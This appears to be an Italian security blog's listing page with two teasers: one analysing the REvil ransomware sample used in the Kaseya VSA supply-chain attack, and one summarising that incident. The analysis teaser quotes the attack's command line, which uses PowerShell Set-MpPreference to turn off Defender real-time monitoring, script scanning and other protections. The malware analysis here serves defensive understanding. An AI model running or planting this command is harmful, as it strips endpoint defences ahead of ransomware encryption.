Analisi sample Revil kaseya

Inizio della compromissione avviato la compromissione attraverso un canale attendibile; sfruttato la fiducia nel codice dell’agente VSA, riflessa nelle‎‎ esclusioni software anti-malware‎‎ necessarie al software Kaseya. C:\WINDOWS\system32\cmd.exe” /c ping 127.0.0.1 -n 4979 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true – EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode Leggi tutto…

Ransomware e Supply Chain Attack

Un attacco Ransomware ha colpito l’azienda Kaseya, azienda sviluppatrice di software per la gestione e supporto IT e che eroga servizi in modalità MSP. Seguendo quanto già visto durante l’attacco SolarWinds, i criminali hanno attaccato l’azienda produttrice del software inserendo codice malevolo all’interno di un falso aggiornamento del prodotto. Colpendo Leggi tutto…